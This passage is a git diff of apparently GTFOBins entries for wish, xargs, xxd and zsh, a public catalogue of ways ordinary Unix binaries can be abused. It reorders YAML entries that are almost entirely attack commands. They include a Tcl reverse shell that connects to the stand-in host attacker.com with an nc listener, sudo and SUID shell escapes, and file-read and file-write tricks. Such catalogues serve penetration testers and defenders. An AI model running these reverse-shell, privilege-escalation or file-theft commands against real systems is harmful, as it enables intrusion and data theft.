- echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
+ sudo-enabled:
+ - code: |
+ sudo wish
+ exec /bin/sh <@stdin >@stdout 2>@stderr
---
diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md
index 5945187..a38ac2e 100644
--- a/_gtfobins/xargs.md
+++ b/_gtfobins/xargs.md
@@ -1,14 +1,16 @@
---
functions:
execute-non-interactive:
- - code: xargs -a /dev/null /usr/bin/id
- sudo-enabled:
- - code: sudo xargs -a /dev/null /usr/bin/id
- suid-enabled:
- - code: ./xargs -a /dev/null /usr/bin/id
+ - code: xargs -a /dev/null /usr/bin/id
file-read:
- - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
- code: |
- LFILE=file_to_read
- xargs -a "$LFILE" -0
+ - description: This works as long as the file does not contain the NUL character,
+ also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed.
+ GNU version only.
+ code: |
+ LFILE=file_to_read
+ xargs -a "$LFILE" -0
+ suid-enabled:
+ - code: "./xargs -a /dev/null /usr/bin/id"
+ sudo-enabled:
+ - code: sudo xargs -a /dev/null /usr/bin/id
---
diff --git a/_gtfobins/xxd.md b/_gtfobins/xxd.md
index c64b879..7d854bb 100644
--- a/_gtfobins/xxd.md
+++ b/_gtfobins/xxd.md
@@ -1,19 +1,19 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo xxd "$LFILE" | xxd -r
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./xxd "$LFILE" | xxd -r
- file-read:
- - code: |
- LFILE=file_to_read
- xxd "$LFILE" | xxd -r
file-write:
- - code: |
- LFILE=file_to_write
- echo data | xxd | xxd -r - "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ echo data | xxd | xxd -r - "$LFILE"
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ xxd "$LFILE" | xxd -r
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./xxd "$LFILE" | xxd -r
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo xxd "$LFILE" | xxd -r
---
diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md
index 1db7501..4e73feb 100644
--- a/_gtfobins/zsh.md
+++ b/_gtfobins/zsh.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: zsh
- sudo-enabled:
- - code: sudo zsh
+ - code: zsh
suid-enabled:
- - code: ./zsh
+ - code: "./zsh"
+ sudo-enabled:
+ - code: sudo zsh
---